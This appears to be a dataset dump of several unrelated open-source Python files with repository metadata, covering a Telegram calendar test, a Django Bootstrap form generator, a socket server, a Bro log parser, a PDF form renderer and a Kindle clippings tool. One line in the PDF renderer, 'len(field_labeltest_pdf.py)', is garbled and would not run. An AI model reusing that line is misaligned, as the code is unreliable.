| 44 | 2020-08-05T20:19:45.000Z | 2022-03-10T22:29:19.000Z | tests/test_detailed.py | TarasRudnyk/python-telegram-bot-calendar | 6bca67e1e4ac1e9cc187d2370ba02a6df9ed60a4 | [
"MIT"
]
| 6 | 2021-01-08T16:07:24.000Z | 2022-02-15T18:39:51.000Z | tests/test_detailed.py | TarasRudnyk/python-telegram-bot-calendar | 6bca67e1e4ac1e9cc187d2370ba02a6df9ed60a4 | [
"MIT"
]
| 20 | 2020-09-08T16:19:22.000Z | 2022-03-14T15:39:56.000Z | import json
import os
import sys
from datetime import date
import pytest
from dateutil.relativedelta import relativedelta
from telegram_bot_calendar import DAY, MONTH, YEAR
from telegram_bot_calendar.detailed import DetailedTelegramCalendar, NOTHING
myPath = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, myPath + '/../')
# todo: fix this test to properly check generated keyboard
@pytest.mark.parametrize(('callback_data', 'result', 'key', 'step'),
[('cbcal_0_s_m_2021_11_13_726706365801178150', None, None, DAY),
('cbcal_0_s_d_2021_11_13_726706365801178150', date(2021, 11, 13), None, DAY),
('cbcal_0_s_y_2020_1_1_726702345801178150', None, None, MONTH),
('cbcal_0_n_726702345801178150', None, None, None),
('cbcal_0_g_m_2022_5_7_726702345801178150', None, None, MONTH)])
def test_process(callback_data, result, key, step):
calendar = DetailedTelegramCalendar(current_date=date(2021, 1, 12))
result_, _, step_ = calendar.process(callback_data)
assert result_ == result and step_ == step
@pytest.mark.parametrize(
('step', 'start', 'diff', 'mind', 'maxd', 'min_button_date', 'max_button_date', 'result_buttons'),
[
(
MONTH, date(2021, 1, 12), relativedelta(months=12), date(2021, 1, 1), date(2021, 3, 2), date(2021, 1, 1),
date(2021, 3, 2),
[{'text': "×", "callback_data": "cbcal_0_n"},
{'text': "2021", "callback_data": "cbcal_0_g_y_2021_1_12"},
{'text': "×", "callback_data": "cbcal_0_n"}]
),
(
MONTH, date(2021, 1, 12), relativedelta(months=12), date(2021, 1, 1), date(2022, 1, 1), date(2021, 1, 1),
date(2021, 12, 1),
[{'text': "×", "callback_data": "cbcal_0_n"},
{'text': "2021", "callback_data": "cbcal_0_g_y_2021_1_12"},
{'text': ">>", "callback_data": "cbcal_0_g_m_2022_1_1"}]
),
(
YEAR, date(2021, 5, 12), relativedelta(years=4), date(2018, 5, 12), date(2023, 5, 12), date(2019, 5, 12),
date(2019, 5, 12),
[{'text': "<<", "callback_data": "cbcal_0_g_y_2017_5_12"},
{'text': " ", "callback_data": "cbcal_0_n"},
{'text': ">>", "callback_data": "cbcal_0_g_y_2025_5_12"}]
)
])
def test__build_nav_buttons(step, start, diff, mind, maxd, min_button_date, max_button_date, result_buttons):
calendar = DetailedTelegramCalendar(current_date=start, min_date=mind, max_date=maxd)
buttons = calendar._build_nav_buttons(step, diff, min_button_date, max_button_date)
result = True
print(buttons[0])
for i, button in enumerate(buttons[0]):
if button['text'] != result_buttons[i]['text'] or button['callback_data'].startswith(result_buttons[i]['text']):
result = False
assert result
| 45.923077 | 121 | 0.60536 | 0 | 0 | 0 | 0 | 2,582 | 0.864123 | 0 | 0 | 796 | 0.266399 |
7b4da977c274712fe30edac1bd68cf28ac41017f | 4,964 | py | Python | django_bootstrap_generator/management/commands/generate_bootstrap.py | rapilabs/django-bootstrap-generator | 51bd0ea3eae69c04b856c1df34c5be1a4abc0385 | [
"MIT"
]
| 1 | 2015-03-10T03:41:39.000Z | 2015-03-10T03:41:39.000Z | django_bootstrap_generator/management/commands/generate_bootstrap.py | rapilabs/django-bootstrap-generator | 51bd0ea3eae69c04b856c1df34c5be1a4abc0385 | [
"MIT"
]
| null | null | null | django_bootstrap_generator/management/commands/generate_bootstrap.py | rapilabs/django-bootstrap-generator | 51bd0ea3eae69c04b856c1df34c5be1a4abc0385 | [
"MIT"
]
| null | null | null | import collections
import types
from optparse import make_option
from django.db.models.loading import get_model
from django.core.management.base import BaseCommand, CommandError
from django.db.models.fields import EmailField, URLField, BooleanField, TextField
def convert(name):
return name.replace('_', ' ').capitalize()
bs_form = """\
<form role="form" class="form-horizontal">
%s\
<div class="form-group">
<div class="col-sm-offset-2 col-sm-10">
<button class="btn btn-primary"><i class="fa fa-save"></i> Save</button>
</div>
</div>
</form>
"""
bs_field = """\
<div class="form-group">
<label for="%(id)s" class="col-sm-2 control-label">%(label)s</label>
<div class="col-sm-10">
%(field)s%(error)s
</div>
</div>
"""
bs_input = """\
<input type="%(input_type)s" %(name_attr)s="%(name)s"%(class)s id="%(id)s"%(extra)s/>"""
bs_select = """\
<select %(name_attr)s="%(name)s" class="form-control" id="%(id)s"%(extra)s>%(options)s
</select>"""
bs_option = """
<option value="%(value)s">%(label)s</option>"""
optgroup = """
<optgroup label="%(label)s">%(options)s
</optgroup>"""
bs_textarea = """\
<textarea %(name_attr)s="%(name)s" class="form-control" id="%(id)s"%(extra)s></textarea>"""
react_error = """
{errors.%(name)s}"""
def format_choice(key, val):
if isinstance(val, collections.Iterable) and not isinstance(val, types.StringTypes):
return optgroup % {
'label': key,
'options': ''.join([bs_option % {'value': value, 'label': label} for value, label in val])
}
else:
return bs_option % {'value': key, 'label': val}
def format_bs_field(model_name, field, flavour):
field_id_html = model_name + '-' + field.name
if flavour == 'react':
name_attr = 'ref'
if isinstance(field, BooleanField):
extra = ' defaultChecked={this.state.data.' + field.name + '}'
else:
extra = ' defaultValue={this.state.data.' + field.name + '}'
else:
name_attr = 'name'
extra = ''
if field.choices:
field_html = bs_select % {
'id': field_id_html,
'options': "".join([format_choice(value, label) for value, label in field.choices]),
'name': field.name,
'name_attr': name_attr,
'extra': extra,
}
elif isinstance(field, TextField):
field_html = bs_textarea % {
'id': field_id_html,
'name': field.name,
'name_attr': name_attr,
'extra': extra,
}
else:
if isinstance(field, EmailField):
input_type = 'email'
class_fullstr = ' class="form-control"'
elif isinstance(field, URLField):
input_type = 'url'
class_fullstr = ' class="form-control"'
elif isinstance(field, BooleanField):
input_type = 'checkbox'
class_fullstr = ''
else:
input_type = 'text'
class_fullstr = ' class="form-control"'
field_html = bs_input % {
'id': field_id_html,
'input_type': input_type,
'name_attr': name_attr,
'name': field.name,
'class': class_fullstr,
'extra': extra,
}
if flavour == 'react':
error = react_error % {
'name': field.name,
}
else:
error = ''
rendered_html = bs_field % {
'id': field_id_html,
'label': convert(field.name),
'field': field_html,
'error': error,
}
if flavour == 'react':
rendered_html = rendered_html.replace('class="col-sm-10"', 'class={"col-sm-10 " + errorClasses.' + field.name + '}')
return rendered_html
def format_bs_form(fields, flavour):
rendered_html = bs_form % fields
if flavour == 'react':
rendered_html = rendered_html.replace('class=', 'className='). \
replace('for=', 'htmlFor=')
return rendered_html
class Command(BaseCommand):
args = '<app_name> <model_name>'
help = 'Prints a bootstrap form for the supplied app & model'
option_list = BaseCommand.option_list + (
make_option('--react',
action='store_true',
dest='react',
default=False,
help='Generate with React\'s ref and defaultValue attributes'),
)
def handle(self, *args, **options):
if len(args) != 2:
raise CommandError('Please supply an app name & model name')
app_name = args[0]
model_name = args[1]
if options['react']:
flavour = 'react'
else:
flavour = None
model_class = get_model(app_name, model_name)
fields = [format_bs_field(model_name, field, flavour) for field in model_class._meta.fields if field.name != 'id']
self.stdout.write(format_bs_form("".join(fields), flavour))
| 29.724551 | 124 | 0.567889 | 924 | 0.18614 | 0 | 0 | 0 | 0 | 0 | 0 | 1,622 | 0.326753 |
7b50d8a97e5f0d3cb0ea0a3693bd90b984964582 | 291 | py | Python | logical/__init__.py | reity/logical | 476193949311824cd63bd9e279a223bcfdceb2e2 | [
"MIT"
]
| null | null | null | logical/__init__.py | reity/logical | 476193949311824cd63bd9e279a223bcfdceb2e2 | [
"MIT"
]
| null | null | null | logical/__init__.py | reity/logical | 476193949311824cd63bd9e279a223bcfdceb2e2 | [
"MIT"
]
| null | null | null | """Gives users direct access to class and functions."""
from logical.logical import\
logical,\
nullary, unary, binary, every,\
nf_, nt_,\
uf_, id_, not_, ut_,\
bf_,\
and_, nimp_, fst_, nif_, snd_, xor_, or_,\
nor_, xnor_, nsnd_, if_, nfst_, imp_, nand_,\
bt_
| 26.454545 | 55 | 0.61512 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 55 | 0.189003 |
7b51df476a25eb10705b2313609ccd9bca295e46 | 1,667 | py | Python | lab_15/server/main.py | MrLuckUA/python_course | 50a87bc54550aedaac3afcce5b8b5c132fb6ec98 | [
"MIT"
]
| null | null | null | lab_15/server/main.py | MrLuckUA/python_course | 50a87bc54550aedaac3afcce5b8b5c132fb6ec98 | [
"MIT"
]
| null | null | null | lab_15/server/main.py | MrLuckUA/python_course | 50a87bc54550aedaac3afcce5b8b5c132fb6ec98 | [
"MIT"
]
| null | null | null | import queue
import select
import socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setblocking(False)
server.bind(('localhost', 9999))
server.listen(5)
inputs = [server]
outputs = []
message_queues = {}
while inputs:
readable, writable, exceptional = select.select(
inputs, outputs, inputs)
for s in readable:
if s is server:
connection, client_address = s.accept()
connection.setblocking(0)
inputs.append(connection)
message_queues[connection] = queue.Queue()
else:
data = s.recv(1024)
if data:
message_queues[s].put(data)
if s not in outputs:
outputs.append(s)
else:
if s in outputs:
outputs.remove(s)
inputs.remove(s)
s.close()
del message_queues[s]
for s in writable:
try:
next_msg = message_queues[s].get_nowait()
except queue.Empty:
outputs.remove(s)
else:
s.send(next_msg)
for s in exceptional:
inputs.remove(s)
if s in outputs:
outputs.remove(s)
s.close()
del message_queues[s]
# import socket
#
# server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# server.bind(('localhost', 9999))
# server.listen(1)
# while True:
# client_socket, addr = server.accept()
# print(f'New connection from {addr}')
# client_socket.send('Hello there, how are you?'.encode('utf-8'))
# answer = client_socket.recv(1024)
# print(answer)
# client_socket.close()
| 26.887097 | 69 | 0.574685 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 387 | 0.232154 |
7b51e80ec38fe59135b07b0729fc19b2c432fc68 | 1,118 | py | Python | febraban/cnab240/itau/sispag/payment/transfer.py | netosjb/febraban-python | a546fa3353d2db1546df60f6f8cc26c7c862c743 | [
"MIT"
]
| 7 | 2019-07-16T11:31:50.000Z | 2019-07-29T19:49:50.000Z | febraban/cnab240/itau/sispag/payment/transfer.py | netosjb/febraban-python | a546fa3353d2db1546df60f6f8cc26c7c862c743 | [
"MIT"
]
| 4 | 2020-05-07T15:34:21.000Z | 2020-11-12T21:09:34.000Z | febraban/cnab240/itau/sispag/payment/transfer.py | netosjb/febraban-python | a546fa3353d2db1546df60f6f8cc26c7c862c743 | [
"MIT"
]
| 6 | 2019-12-04T00:40:10.000Z | 2020-11-05T18:39:40.000Z | from .segmentA import SegmentA
class Transfer:
def __init__(self):
self.segmentA = SegmentA()
def toString(self):
return self.segmentA.content
def amountInCents(self):
return self.segmentA.amountInCents()
def setSender(self, user):
self.segmentA.setSenderBank(user.bank)
def setReceiver(self, user):
self.segmentA.setReceiver(user)
self.segmentA.setReceiverBank(user.bank)
def setAmountInCents(self, value):
self.segmentA.setAmountInCents(value)
def setPositionInLot(self, index):
self.segmentA.setPositionInLot(index)
def setLot(self, lot):
self.segmentA.setLot(lot)
def setScheduleDate(self, date):
self.segmentA.setScheduleDate(date)
def setInfo(self, reason="10"):
"""
This method set config information in the payment
Args:
reason: String - Payment reason - 10 Credito em Conta Corrente, read: NOTES 26
"""
self.segmentA.setInfo(reason)
def setIdentifier(self, identifier):
self.segmentA.setIdentifier(identifier)
| 24.844444 | 91 | 0.658318 | 1,084 | 0.969589 | 0 | 0 | 0 | 0 | 0 | 0 | 184 | 0.16458 |
7b53b8e74efe57ed1e451add7d928562719e4e93 | 4,689 | py | Python | BroLog.py | jcwoods/BroLog | b95c91178d4038d1e363cb8c8ef9ecc64a23193f | [
"MIT"
]
| null | null | null | BroLog.py | jcwoods/BroLog | b95c91178d4038d1e363cb8c8ef9ecc64a23193f | [
"MIT"
]
| null | null | null | BroLog.py | jcwoods/BroLog | b95c91178d4038d1e363cb8c8ef9ecc64a23193f | [
"MIT"
]
| null | null | null | #!/usr/bin/python
import sys
import codecs
import ipaddress as ip
import pandas as pd
from datetime import datetime as dt
class BroLogFile:
def doSeparator(self, fields):
sep = fields[1]
if len(sep) == 1: # a literal?
self.separator = sep
elif sep[:2] == '\\x': # a hexadecimal (ASCII) value?
self.separator = chr(int(sep[2:], 16))
else:
raise ValueError('invalid separator format in log file')
return
def default_transform(self, fields):
ntypes = len(self.field_types)
for fno in range(ntypes):
if fields[fno] == self.unset_field:
fields[fno] = None
continue
elif fields[fno] == self.empty_field:
fields[fno] = ''
continue
elif self.field_types[fno] == 'count' or self.field_types[fno] == 'port':
try:
val = int(fields[fno])
fields[fno] = val
except:
pass
elif self.field_types[fno] == 'interval':
try:
val = float(fields[fno])
fields[fno] = val
except:
pass
#elif self.field_types[fno] == 'addr':
# try:
# ip_addr = ip.ip_address(fields[fno])
# fields[fno] = int(ip_addr)
# except ValueError:
# # IPv6 address? TBD...
# fields[fno] = 0
elif self.field_types[fno] == 'time':
ts = float(fields[fno])
t = dt.fromtimestamp(ts).isoformat()
fields[fno] = t
return
def __init__(self, fname, row_transform = None, row_filter = None):
"""
Crete a new Pandas DataFrame from the given file.
fname is the name of the file to be opened.
row_transform is an (optional) function function which will be applied
to each row as it is read. It may modify the individual column
values, such as by performing integer conversions on exptected
numeric fields. This function does not return a value.
row_filter is an (optional) function which will be used to test each
input row. It is executed after row_transform (if one exists),
and must return a boolean value. If True, the row will be
included in the result. If False, the row will be suppressed.
May generate an exception if the file could not be opened or if an
invalid format is found in the separator value.
"""
self.row_transform = row_transform
self.row_filter = row_filter
self.field_names = []
self.field_types = []
self.empty_field = '(empty)'
self.unset_field = '-'
self.set_separator = ','
self.separator = ' '
self.rows = []
self.field_map = None
#f = file(fname, 'r')
f = codecs.open(fname, 'r', encoding = 'utf-8')
line = f.readline()
while line[0] == '#':
fields = line[1:].strip().split(self.separator)
if fields[0] == 'separator':
self.doSeparator(fields)
elif fields[0] == 'empty_field':
self.empty_field = fields[1]
elif fields[0] == 'unset_field':
self.unset_field = fields[1]
elif fields[0] == 'fields':
self.field_names = fields[1:]
elif fields[0] == 'types':
self.field_types = fields[1:]
line = f.readline()
for line in f:
if line[0] == '#': continue
fields = line.rstrip("\r\n").split(self.separator)
if self.row_transform is not None:
self.row_transform(fields)
else:
self.default_transform(fields)
if self.row_filter is not None:
if self.row_filter(fields, self.field_types, self.field_names) is False: continue
self.rows.append(fields)
return
def asDataFrame(self):
df = pd.DataFrame(self.rows, columns = self.field_names)
return df
def __len__(self):
return len(self.rows)
def conn_filter(fields, types, names):
return fields[6] == 'tcp'
def main(argv):
con = BroLogFile(argv[1])
#for n in range(10):
# print(con.rows[n])
df = con.asDataFrame()
print(df.head(10))
print(df.describe())
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv))
| 28.591463 | 97 | 0.527831 | 4,241 | 0.904457 | 0 | 0 | 0 | 0 | 0 | 0 | 1,379 | 0.294093 |
7b53fdee739e7f6188764d53517bc20b22165406 | 8,288 | py | Python | test_pdf.py | ioggstream/json-forms-pdf | 9f18cf239ae892ebb0018bfd4a8f792af35ccfac | [
"BSD-3-Clause"
]
| 2 | 2020-06-18T13:31:32.000Z | 2022-02-21T08:30:37.000Z | test_pdf.py | ioggstream/json-forms-pdf | 9f18cf239ae892ebb0018bfd4a8f792af35ccfac | [
"BSD-3-Clause"
]
| 2 | 2020-05-25T17:31:52.000Z | 2020-06-23T17:32:03.000Z | test_pdf.py | ioggstream/json-forms-pdf | 9f18cf239ae892ebb0018bfd4a8f792af35ccfac | [
"BSD-3-Clause"
]
| null | null | null | # simple_checkboxes.py
import logging
from os.path import basename
from pathlib import Path
import jsonschema
import pytest
# from reportlab.pdfbase import pdfform
import yaml
from reportlab.pdfgen import canvas
uischema = yaml.safe_load(Path("jsonforms-react-seed/src/uischema.json").read_text())
form_schema = yaml.safe_load(Path("jsonforms-react-seed/src/schema.json").read_text())
form_fields = jsonschema.RefResolver.from_schema(form_schema)
log = logging.getLogger()
logging.basicConfig(level=logging.DEBUG)
DATA = {
"name": "foo",
"description": "Confirm if you have passed the subject\nHereby ...",
"done": True,
"recurrence": "Daily",
"rating": "3",
"due_date": "2020-05-21",
"recurrence_interval": 421,
}
def localize_date(date_string):
try:
from dateutil.parser import parse as dateparse
import locale
locale.nl_langinfo(locale.D_FMT)
d = dateparse(date_string)
return d.strftime(locale.nl_langinfo(locale.D_FMT))
except:
return date_string
def csetup(name, font_size=12):
c = canvas.Canvas(f"{name}.pdf")
c.setFont("Courier", font_size)
return c
class FormRender(object):
def __init__(self, ui, schema, font_size=11, font_size_form=None, data=DATA):
"""
:param ui: object containing ui-schema
:param schema: structure containing the schema
"""
self.ui = ui
self.schema = schema
self.resolver = jsonschema.RefResolver.from_schema(schema)
self.font_size = font_size
self.font_size_form = font_size_form or font_size
self.data = data or {}
self.line_feed = 5 * self.font_size
@staticmethod
def from_file(ui_path, schema_path):
ui = yaml.safe_load(Path(ui_path).read_text())
schema = yaml.safe_load(Path(schema_path).read_text())
return FormRender(ui, schema)
def layout_to_form(self, layout, form, canvas, point):
assert "elements" in layout
x, y = point
if layout["type"] == "Group":
canvas.setFont("Courier", int(self.font_size * 1.5))
canvas.drawString(x, y, layout["label"])
canvas.setFont("Courier", self.font_size)
y -= 2 * self.line_feed
if layout["type"] == "HorizontalLayout":
y -= 10
point = (x, y)
for e in layout["elements"]:
x, y = self.element_to_form(e, form, canvas, (x, y))
if layout["type"] == "HorizontalLayout":
x += 250
y = point[1]
if layout["type"] == "HorizontalLayout":
return point[0], y - self.line_feed
return x, y - self.line_feed
def element_to_form(self, element, form, canvas, point):
x, y = point
if "elements" in element:
return self.layout_to_form(element, form, canvas, (x, y))
assert "type" in element
assert "scope" in element
supported_types = {
"string",
"number",
"integer",
"boolean",
}
schema_url, schema = self.resolver.resolve(element["scope"])
field_type = schema["type"]
if field_type not in supported_types:
raise NotImplementedError(field_type)
property_name = basename(schema_url)
field_label = element.get("label") or labelize(schema_url)
render = self.render_function(form, property_name, schema, self.data)
y -= self.line_feed
params = {
"name": schema_url,
"x": x + self.font_size * len(field_labeltest_pdf.py) // 1.4,
"y": y,
"forceBorder": True,
}
if schema.get("description"):
params.update({"tooltip": schema.get("description")})
canvas.drawString(x, y, field_label)
render(**params)
return x, y
def render_function(self, form, name, schema, data=None):
if schema["type"] in ("integer", "number"):
def _render_number(**params):
params.update(
{
"width": self.font_size_form * 5,
"height": self.font_size_form * 1.5,
}
)
value = data.get(name)
if value:
params.update(
{"value": str(value), "borderStyle": "inset",}
)
return form.textfield(**params)
return _render_number
if "enum" in schema:
def _render_enum(**params):
options = [(x,) for x in schema["enum"]]
params.update({"options": options, "value": schema["enum"][0]})
return form.choice(**params)
# return _render_enum
def _render_enum_2(**params):
x, y = params["x"], params["y"]
for v in schema["enum"]:
form.radio(
name=name,
tooltip="TODO",
value=v,
selected=False,
x=x,
y=y,
size=self.font_size_form,
buttonStyle="check",
borderStyle="solid",
shape="square",
forceBorder=True,
)
form.canv.drawString(x + self.font_size_form * 2, y, v)
x += self.font_size * len(v)
return params["x"], y
return _render_enum_2
if schema["type"] == "boolean":
def _render_bool(**params):
params.update(
{
"buttonStyle": "check",
"size": self.font_size_form,
"shape": "square",
}
)
if data.get(name):
params.update({"checked": "true"})
return form.checkbox(**params)
return _render_bool
def _render_string(**params):
value = data.get(name) or schema.get("default")
params.update(
{
"width": self.font_size_form * 10,
"height": self.font_size_form * 1.5,
"fontSize": self.font_size_form,
"borderStyle": "inset",
}
)
if schema.get("format", "").startswith("date"):
params.update(
{"width": self.font_size_form * 8,}
)
if value:
if schema.get("format", "").startswith("date"):
value = localize_date(value)
params.update({"value": value})
return form.textfield(**params)
return _render_string
def labelize(s):
return basename(s).replace("_", " ").capitalize()
def test_get_fields():
import PyPDF2
f = PyPDF2.PdfFileReader("simple.pdf")
ff = f.getFields()
assert "#/properties/given_name" in ff
@pytest.fixture(scope="module", params=["group", "simple"])
def harn_form_render(request):
label = request.param
log.warning("Run test with, %r", label)
fr = FormRender.from_file(f"data/ui-{label}.json", f"data/schema-{label}.json")
canvas = csetup(label)
return fr, canvas
def test_group(harn_form_render):
point = (0, 800)
fr, canvas = harn_form_render
layout = fr.ui
fr.layout_to_form(layout, canvas.acroForm, canvas, point)
canvas.save()
def test_text():
c = canvas.Canvas("form.pdf")
c.setFont("Courier", 12)
c.drawCentredString(300, 700, "Pets")
c.setFont("Courier", 11)
form = c.acroForm
x, y = 110, 645
for v in "inizio cessazione talpazione donazione".split():
form.radio(
name="radio1",
tooltip="Field radio1",
value=v,
selected=False,
x=x,
y=y,
buttonStyle="check",
borderStyle="solid",
shape="square",
forceBorder=True,
)
c.drawString(x + 11 * 2, y, v)
x += 11 * len(v)
c.save()
| 30.358974 | 86 | 0.527389 | 5,770 | 0.696187 | 0 | 0 | 503 | 0.06069 | 0 | 0 | 1,290 | 0.155647 |
7b549c8cf31113881352739cc51b8f9b8d3428b5 | 701 | py | Python | pos_map.py | olzama/neural-supertagging | 340a9b3eaf6427e5ec475cd03bc6f4b3d4891ba4 | [
"MIT"
]
| null | null | null | pos_map.py | olzama/neural-supertagging | 340a9b3eaf6427e5ec475cd03bc6f4b3d4891ba4 | [
"MIT"
]
| null | null | null | pos_map.py | olzama/neural-supertagging | 340a9b3eaf6427e5ec475cd03bc6f4b3d4891ba4 | [
"MIT"
]
| null | null | null |
'''
Assuming the following tag-separated format:
VBP+RB VBP
VBZ+RB VBZ
IN+DT IN
(etc.)
'''
class Pos_mapper:
def __init__(self, filepath):
with open(filepath,'r') as f:
lines = f.readlines()
self.pos_map = {}
self.unknowns = []
for ln in lines:
if ln:
tag,mapping = ln.strip().split('\t')
self.pos_map[tag] = mapping
def map_tag(self,tag):
if tag in self.pos_map:
return self.pos_map[tag]
else:
#return the first tag
self.unknowns.append(tag)
#print('Unknown POS tag: ' + tag)
tags = tag.split('+')
return tags[0] | 23.366667 | 52 | 0.513552 | 607 | 0.865906 | 0 | 0 | 0 | 0 | 0 | 0 | 154 | 0.219686 |
7b580428c6c3fc7e1f2b5ec4c50a922c0d642dcf | 4,051 | py | Python | src/nti/externalization/integer_strings.py | NextThought/nti.externalization | 5a445b85fb809a7c27bf8dbe45c29032ece187d8 | [
"Apache-2.0"
]
| null | null | null | src/nti/externalization/integer_strings.py | NextThought/nti.externalization | 5a445b85fb809a7c27bf8dbe45c29032ece187d8 | [
"Apache-2.0"
]
| 78 | 2017-09-15T14:59:58.000Z | 2021-10-05T17:40:06.000Z | src/nti/externalization/integer_strings.py | NextThought/nti.externalization | 5a445b85fb809a7c27bf8dbe45c29032ece187d8 | [
"Apache-2.0"
]
| null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Functions to represent potentially large integers as the shortest
possible human-readable and writable strings. The motivation is to be
able to take int ids as produced by an :class:`zc.intid.IIntId`
utility and produce something that can be written down and typed in by
a human. To this end, the strings produced have to be:
* One-to-one and onto the integer domain;
* As short as possible;
* While not being easily confused;
* Or accidentaly permuted
To meet those goals, we define an alphabet consisting of the ASCII
digits and upper and lowercase letters, leaving out troublesome pairs
(zero and upper and lower oh and upper queue, one and upper and lower
ell) (actually, those troublesome pairs will all map to the same
character).
We also put a version marker at the end of the string so we can evolve
this algorithm gracefully but still honor codes in the wild.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__all__ = [
'to_external_string',
'from_external_string',
]
# stdlib imports
import string
try:
maketrans = str.maketrans
except AttributeError: # Python 2
from string import maketrans # pylint:disable=no-name-in-module
translate = str.translate
# In the first version of the protocol, the version marker, which would
# come at the end, is always omitted. Subsequent versions will append
# a value that cannot be produced from the _VOCABULARY
_VERSION = '$'
# First, our vocabulary.
# Remove the letter values o and O, Q (confused with O if you're sloppy), l and L,
# and i and I, leaving the digits 1 and 0
_REMOVED = 'oOQlLiI'
_REPLACE = '0001111'
_VOCABULARY = ''.join(
reversed(sorted(list(set(string.ascii_letters + string.digits) - set(_REMOVED))))
)
# We translate the letters we removed
_TRANSTABLE = maketrans(_REMOVED, _REPLACE)
# Leaving us a base vocabulary to map integers into
_BASE = len(_VOCABULARY)
_ZERO_MARKER = '@' # Zero is special
def from_external_string(key):
"""
Turn the string in *key* into an integer.
>>> from nti.externalization.integer_strings import from_external_string
>>> from_external_string('xkr')
6773
:param str key: A native string, as produced by `to_external_string`.
(On Python 2, unicode *keys* are also valid.)
:raises ValueError: If the key is invalid or contains illegal characters.
:raises UnicodeDecodeError: If the key is a Unicode object, and contains
non-ASCII characters (which wouldn't be valid anyway)
"""
if not key:
raise ValueError("Improper key")
if not isinstance(key, str):
# Unicode keys cause problems on Python 2: The _TRANSTABLE is coerced
# to Unicode, which fails because it contains non-ASCII values.
# So instead, we encode the unicode string to ascii, which, if it is a
# valid key, will work
key = key.decode('ascii') if isinstance(key, bytes) else key.encode('ascii')
# strip the version if needed
key = key[:-1] if key[-1] == _VERSION else key
key = translate(key, _TRANSTABLE) # translate bad chars
if key == _ZERO_MARKER:
return 0
int_sum = 0
for idx, char in enumerate(reversed(key)):
int_sum += _VOCABULARY.index(char) * pow(_BASE, idx)
return int_sum
def to_external_string(integer):
"""
Turn an integer into a native string representation.
>>> from nti.externalization.integer_strings import to_external_string
>>> to_external_string(123)
'xk'
>>> to_external_string(123456789)
'kVxr5'
"""
# we won't step into the while if integer is 0
# so we just solve for that case here
if integer == 0:
return _ZERO_MARKER
result = ''
# Simple string concat benchmarks the fastest for this size data,
# among a list and an array.array( 'c' )
while integer > 0:
integer, remainder = divmod(integer, _BASE)
result = _VOCABULARY[remainder] + result
return result
| 30.923664 | 85 | 0.709701 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,752 | 0.679338 |
7b5a89b5d003d45628ff5ec0925287bf4802eb5a | 2,882 | py | Python | chokitto.py | WKSu/chokitto | 9eb0c7e69a62aede76cd0c8fd43dd4879bf03ff8 | [
"MIT"
]
| null | null | null | chokitto.py | WKSu/chokitto | 9eb0c7e69a62aede76cd0c8fd43dd4879bf03ff8 | [
"MIT"
]
| null | null | null | chokitto.py | WKSu/chokitto | 9eb0c7e69a62aede76cd0c8fd43dd4879bf03ff8 | [
"MIT"
]
| 1 | 2021-01-16T18:51:57.000Z | 2021-01-16T18:51:57.000Z | #!/usr/bin/python3
import argparse, os
from collections import defaultdict
from lib.data import *
from lib.exporters import *
from lib.filters import *
from lib.parsers import *
def parse_arguments():
arg_parser = argparse.ArgumentParser(description='chokitto')
arg_parser.add_argument('input', help='path to clippings file')
arg_parser.add_argument('-o', '--output', help='path to output file (default: STDOUT)')
arg_parser.add_argument('-p', '--parser', default='kindle', choices=list(PARSER_MAP.keys()), help='parser for clippings file (default: kindle)')
arg_parser.add_argument('-e', '--exporter', default='markdown', help='clipping exporter (default: markdown)')
arg_parser.add_argument('-m', '--merge', action='store_true', help='merge clippings of different types if they occur at the same location (default: False)')
arg_parser.add_argument('-f', '--filters', nargs='*', help='list of filters to apply (default: None, format: "filter(\'arg\',\'arg\')")')
arg_parser.add_argument('-ls', '--list', action='store_true', help='list titles of documents in clippings file and exit (default: False)')
arg_parser.add_argument('-v', '--verbose', action='store_true', help='set verbosity (default: False)')
return arg_parser.parse_args()
def get_user_input(prompt, options=['y', 'n']):
ans = None
while ans not in options:
ans = input(f"{prompt} [{'/'.join(options)}] ")
return ans
def main():
args = parse_arguments()
# parse clippings
parser = PARSER_MAP[args.parser](verbose=args.verbose)
documents = parser.parse(args.input)
# merge and deduplicate clippings
if args.merge:
for title, author in documents:
documents[(title, author)].merge_clippings()
documents[(title, author)].deduplicate_clippings()
# set up filters
filters = parse_filters(args.filters) if args.filters else []
if filters:
# print filters
if args.verbose:
print("Filters (%d total):" % len(filters))
for filt in filters:
print(" %s" % filt)
# apply filters
documents = apply_filters(documents, filters)
# list documents (and exit if list flag was used)
if args.verbose or args.list:
print("Documents (%d total):" % len(documents))
for title, author in sorted(documents):
print(" %s" % documents[(title, author)])
if args.list: return
# set up exporter
exporter = parse_exporter(args.exporter)
if args.output:
# check if file already exists
if os.path.exists(args.output):
ans = get_user_input(f"File '{args.output}' already exists. Overwrite?")
if ans == 'n':
return
exporter.write(documents, args.output)
if args.verbose: print(f"Output:\n Output was saved to '{args.output}' using {exporter}.")
else:
if args.verbose: print("Output:\n")
print(exporter(documents))
if __name__ == '__main__':
main()
| 37.428571 | 161 | 0.683553 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,044 | 0.362248 |
7b5ac6eff9c37a22900d99e140cd578daaa0f186 | 736 | py | Python | torrent.py | olazona/colabtorrent | bbddec0fc12eab672a711769f7d071ada8235c86 | [
"Apache-2.0"
]
| 3 | 2020-07-30T09:29:00.000Z | 2022-02-05T05:19:30.000Z | torrent.py | olazona/colabtorrent | bbddec0fc12eab672a711769f7d071ada8235c86 | [
"Apache-2.0"
]
| null | null | null | torrent.py | olazona/colabtorrent | bbddec0fc12eab672a711769f7d071ada8235c86 | [
"Apache-2.0"
]
| 4 | 2020-03-31T15:42:38.000Z | 2021-09-27T07:30:07.000Z | # -*- coding: utf-8 -*-
"""Torrent.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1Uo1_KHGxOe_Dh4-DjQyEb0wROp-tMv0w
"""
TorrName = 'YOUR TORRENT NAME'
FolderPath = f'/content/drive/My Drive/{TorrName}'
TorrPath = f'{TorrName}.torrent'
def init():
import os
os.system('apt-get install transmission-cli')
from google.colab import drive
drive.mount('/content/drive')
def download(loc, tor):
assert (os.path.exists(tor)==True), "The torrent file doesn't exist"
